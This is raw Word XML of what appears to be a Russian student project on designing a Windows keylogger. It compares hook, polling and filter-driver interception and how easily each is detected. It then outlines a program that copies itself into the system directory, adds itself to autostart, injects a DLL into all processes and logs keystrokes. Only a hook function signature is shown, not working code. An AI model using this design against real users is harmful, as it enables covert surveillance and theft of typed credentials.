        <w:t xml:space="preserve">ытия для всех потоков в системе. </w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Фильтрующая функция ловушки в этом случае располагается в отдельной динамической библиотеке, которая внедряется во все процессы системы, занимающиеся обработкой сообщений. При выборке из очереди сообщений любого потока клавиатурного сообщения система вызовет уст</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ановленную фильтрующую функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="00F02139" w:rsidRDefault="008F6440" w:rsidP="008B09E8">
      <w:pPr>
        <w:spacing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 xml:space="preserve">  К достоинствам этого метода перехвата относится простота и гарантированный перехват всех нажатий клавиатуры, из недостатков можно отметить необходимость наличия отдельного файла динамической библиотеки и относительную простоту обнаружения по причине внедрения во все системные процессы.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="00F97D6F">
      <w:pPr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Использование циклического опроса состояния клавиатуры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="a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Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций GetAsynсKeyState или GetKeyState. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тояния клавиш</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; анализируя их, можно понять, какие клавиши были нажаты или отпущены после последнего опроса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="a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 xml:space="preserve">Достоинства данного метода — предельная простота реализации, отсутствие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дополнительного модуля </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>недостатки — отсутствие гарантии обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="a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Использование драйвер-фильтра драйвера класса клавиатуры Kbdclass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRPr="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="00F07332">
      <w:pPr>
        <w:pStyle w:val="a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Документированный в DDK способ перехвата</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Снифферы</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\Device\KeyboardClass0»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, созданного драйвером Kbdclass. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Фильтруются только запросы типа IRP_MJ_READ, </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>поскольку именно они позволяют получить ко</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ды нажатых и отпущенных клавиш.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRPr="007E450A" w:rsidRDefault="006B3D75" w:rsidP="00F07332">
      <w:pPr>
        <w:pStyle w:val="a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Достоинства — гарантированный перехват всех нажатий, невозможность обнаруж</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ения без использования драйвера</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Недостатки — необходимость установки собственного драйвера.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="007E450A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A65973" w:rsidRPr="00743E0B" w:rsidRDefault="00A65973" w:rsidP="00F07332">
      <w:pPr>
        <w:pStyle w:val="a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редств для разработки приложения необходимо учесть множество различных аспектов, наиболее важным из которых является язык программирования, так как он в значительной степени определяет другие доступные средства.</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для реализации клавиатурного сниффера наиболее эффективным будет использование языков программирования </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C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и </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>++.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Они предоставляют все средства для создания приложения для операционных систем семейства </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B" w:rsidRPr="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRPr="00532646" w:rsidRDefault="006B3D75" w:rsidP="00532646">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646" w:rsidP="00532646">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="001B7A51">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRPr="008B09E8" w:rsidRDefault="00E47FA2" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc420705260"/>
      <w:bookmarkStart w:id="13" w:name="_Toc420752646"/>
      <w:r w:rsidRPr="008B09E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidR="008B09E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ИСТЕМНОЕ ПРОЕКТИРОВАНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00C949A2" w:rsidP="002E4FAE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данный проект включает в себя непосредственно два модуля: модуль для установки и инж</w:t>
      </w:r>
      <w:r w:rsidR="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>екции динамической библиотеки</w:t>
      </w:r>
      <w:r w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сама динамическая библиотека. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRDefault="001C1985" w:rsidP="001C1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ектирования приложения были определены задачи, которые должна выполнять программа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRDefault="001C1985" w:rsidP="001C1985">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276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нажатий клавиш</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRDefault="001C1985" w:rsidP="001C1985">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276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Инжекция программы в сторонние процессы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRPr="001C1985" w:rsidRDefault="001C1985" w:rsidP="001C1985">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276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рограммы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRPr="002E4FAE" w:rsidRDefault="001C1985" w:rsidP="002E4FAE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="36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20705261"/>
      <w:bookmarkStart w:id="15" w:name="_Toc420752647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05E97" w:rsidRPr="002E4FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1 Способ взаимодействия пользователя и программы.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00205E97" w:rsidP="002E4FA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пользователя с программой был разработан интуитивно понятный интерфейс лог-файлов.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00205E97" w:rsidP="002E4FA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взаимодействия пользователя с программой. </w:t>
      </w:r>
      <w:r w:rsidR="003E2ED4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для запуска </w:t>
      </w:r>
      <w:r w:rsidR="00335965">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и установки </w:t>
      </w:r>
      <w:r w:rsidR="003E2ED4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidR="00335965">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>требуется запустить исполняющий файл программы от имени администратора. Программа автоматически установится на компьютер и запустится, начав писать лог-файлы.</w:t>
      </w:r>
      <w:r w:rsidR="00CA58F9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> После чего работа с программой сводится к анализу лог-файлов.</w:t>
      </w:r>
      <w:r w:rsidR="00C8742B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRPr="002E4FAE" w:rsidRDefault="001C1985" w:rsidP="002E4FAE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:line="36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20705262"/>
      <w:bookmarkStart w:id="17" w:name="_Toc420752648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8742B" w:rsidRPr="002E4FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2 Структурная схема программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRPr="00DF47AE" w:rsidRDefault="001C1985" w:rsidP="00BF7284">
      <w:pPr>
        <w:ind w:firstLine="360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8.8pt;margin-top:38.75pt;width:238.5pt;height:224.25pt;z-index:251659264;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId8" o:title="Безымянный"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="002E4FAE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для реализации поставленных задач, приложение разделили на следующие блоки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRPr="005E74AB" w:rsidRDefault="001C1985" w:rsidP="001C1985">
      <w:pPr>
        <w:spacing w:after="160"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1 – Схема взаимодействия блоков</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1985" w:rsidRDefault="001C1985" w:rsidP="00BF7284">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002E4FAE" w:rsidP="00BF7284">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4" w:rsidRPr="00BF7284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Блок установки программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7284" w:rsidRPr="00BF7284" w:rsidRDefault="00BF7284" w:rsidP="00BF7284">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Блок инжекции библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7284" w:rsidRPr="00BF7284" w:rsidRDefault="00BF7284" w:rsidP="00BF7284">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Блок установки хука</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E74AB" w:rsidRDefault="00BF7284" w:rsidP="005E74AB">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7284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Блок создания лог-файлов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRPr="00BF7284" w:rsidRDefault="00BF7284" w:rsidP="00BF728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лок установки программы служит для копирования исполняемого</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и ря</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дом лежащей библиотеки</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из текущей директории в ди</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ректорию операционной системы. И</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сполняемый</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> файл заносится в автозагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C203E3" w:rsidRDefault="00BF7284" w:rsidP="00BF728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лок инжекции библиотеки в</w:t>
      </w:r>
      <w:r w:rsidR="002B4BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> моме</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нт выполнения программы создает</w:t>
      </w:r>
      <w:r w:rsidR="00C203E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRPr="00A16734" w:rsidRDefault="00BF7284" w:rsidP="00A1673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лок установки хука служит для у</w:t>
      </w:r>
      <w:r w:rsidR="001C1985">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>становки низкоуровневого хука.  З</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">аписи </w:t>
      </w:r>
      <w:r w:rsidR="00A16734">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информации об активности пользователя в лог-файлы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="0070493C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7545"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRDefault="00E47FA2" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRPr="00A16734" w:rsidRDefault="0077143A" w:rsidP="00A16734">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc420705263"/>
      <w:bookmarkStart w:id="19" w:name="_Toc420752649"/>
      <w:r w:rsidRPr="00A16734">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ф</w:t>
      </w:r>
      <w:r w:rsidR="00A16734">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>УНКЦИОНАЛЬНОЕ ПРОЕКТИРОВАНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="000872BA" w:rsidRDefault="000872BA" w:rsidP="00712AC9">
      <w:pPr>
        <w:spacing w:line="36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включает в себя описание основных методов программы и их листинги.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D413B" w:rsidRPr="00A16734" w:rsidRDefault="001C1985" w:rsidP="00A16734">
      <w:pPr>
        <w:pStyle w:val="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20705264"/>
      <w:bookmarkStart w:id="21" w:name="_Toc42075265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16734" w:rsidRPr="00A16734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0D413B" w:rsidRPr="00A16734">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Низкоуровневый хук</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00F97D6F" w:rsidP="00712AC9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="348"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LRESULT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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALLB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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2E7A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Code</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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PARAM</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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aram</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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PARAM</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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Param</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истем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ызывает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эту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функцию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каждый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раз</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>когд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собирается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ставить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новое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событие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вод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с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клавиатуры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очередь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вод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данных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потока</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00984B5C" w:rsidP="00712AC9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2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Param </w:t>
      </w:r>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Устанавливает идентификатор сообщения клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16734" w:rsidRDefault="00984B5C" w:rsidP="00712AC9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2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Param </w:t>
      </w:r>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16734" w:rsidRDefault="00A16734" w:rsidP="00712AC9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="3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функция обрабатывает только события нажатия клавиш и </w:t>
      </w:r>
      <w:r w:rsidR="00712AC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">события </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нажатия системных клавиш</w:t>
      </w:r>
      <w:r w:rsidR="00712AC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
